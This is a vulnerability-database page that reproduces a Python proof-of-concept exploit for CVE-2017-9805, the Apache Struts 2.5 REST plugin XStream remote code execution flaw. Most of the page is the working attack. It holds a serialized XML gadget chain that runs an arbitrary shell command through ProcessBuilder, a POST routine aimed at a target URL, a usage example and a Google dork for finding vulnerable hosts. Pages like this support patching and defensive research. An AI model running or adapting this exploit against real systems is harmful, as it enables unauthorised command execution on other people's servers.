Recent Vulnerabilities Product List Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2017-9805

Publish Date: 06 Sep 2017

Author: Warflop

                # Exploit Title: Struts 2.5 - 2.5.12 REST Plugin XStream RCE
# Google Dork: filetype:action
# Date: 06/09/2017
# Exploit Author: Warflop
# Vendor Homepage: https://struts.apache.org/
# Software Link: http://mirror.nbtelecom.com.br/apache/struts/2.5.10/struts-2.5.10-all.zip
# Version: Struts 2.5 – Struts 2.5.12
# Tested on: Struts 2.5.10
# CVE : 2017-9805

#!/usr/bin/env python3
# coding=utf-8
# *****************************************************
# Struts CVE-2017-9805 Exploit
# Warflop (http://securityattack.com.br/)
# Greetz: Pimps &amp; G4mbl3r
# *****************************************************
import requests
import sys

def exploration(command):

	exploit = '''
				&lt;map&gt;
				&lt;entry&gt;
				&lt;jdk.nashorn.internal.objects.NativeString&gt;
				&lt;flags&gt;0&lt;/flags&gt;
				&lt;value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"&gt;
				&lt;dataHandler&gt;
				&lt;dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"&gt;
				&lt;is class="javax.crypto.CipherInputStream"&gt;
				&lt;cipher class="javax.crypto.NullCipher"&gt;
				&lt;initialized&gt;false&lt;/initialized&gt;
				&lt;opmode&gt;0&lt;/opmode&gt;
				&lt;serviceIterator class="javax.imageio.spi.FilterIterator"&gt;
				&lt;iter class="javax.imageio.spi.FilterIterator"&gt;
				&lt;iter class="java.util.Collections$EmptyIterator"/&gt;
				&lt;next class="java.lang.ProcessBuilder"&gt;
				&lt;command&gt;
				&lt;string&gt;/bin/sh&lt;/string&gt;&lt;string&gt;-c&lt;/string&gt;&lt;string&gt;'''+ command +'''&lt;/string&gt;
				&lt;/command&gt;
				&lt;redirectErrorStream&gt;false&lt;/redirectErrorStream&gt;
				&lt;/next&gt;
				&lt;/iter&gt;
				&lt;filter class="javax.imageio.ImageIO$ContainsFilter"&gt;
				&lt;method&gt;
				&lt;class&gt;java.lang.ProcessBuilder&lt;/class&gt;
				&lt;name&gt;start&lt;/name&gt;
				&lt;parameter-types/&gt;
				&lt;/method&gt;
				&lt;name&gt;foo&lt;/name&gt;
				&lt;/filter&gt;
				&lt;next class="string"&gt;foo&lt;/next&gt;
				&lt;/serviceIterator&gt;
				&lt;lock/&gt;
				&lt;/cipher&gt;
				&lt;input class="java.lang.ProcessBuilder$NullInputStream"/&gt;
				&lt;ibuffer/&gt;
				&lt;done&gt;false&lt;/done&gt;
				&lt;ostart&gt;0&lt;/ostart&gt;
				&lt;ofinish&gt;0&lt;/ofinish&gt;
				&lt;closed&gt;false&lt;/closed&gt;
				&lt;/is&gt;
				&lt;consumed&gt;false&lt;/consumed&gt;
				&lt;/dataSource&gt;
				&lt;transferFlavors/&gt;
				&lt;/dataHandler&gt;
				&lt;dataLen&gt;0&lt;/dataLen&gt;
				&lt;/value&gt;
				&lt;/jdk.nashorn.internal.objects.NativeString&gt;
				&lt;jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/&gt;
				&lt;/entry&gt;
				&lt;entry&gt;
				&lt;jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/&gt;
				&lt;jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/&gt;
				&lt;/entry&gt;
				&lt;/map&gt;
				'''


	url = sys.argv[1]

	headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0',
			'Content-Type': 'application/xml'}

	request = requests.post(url, data=exploit, headers=headers)
	print request.text

if len(sys.argv) &lt; 3:
	print ('CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE')
	print ('[*] Warflop - http://securityattack.com.br')
	print ('[*] Greatz: Pimps &amp; G4mbl3r')
	print ('[*] Use: python struts2.py URL COMMAND')
	print ('[*] Example: python struts2.py http://sitevulnerable.com/struts2-rest-showcase/orders/3 id')
	exit(0)
else:
	exploration(sys.argv[2])

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Product List Vendor List Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution

Vulmon Search

About

Products

Connect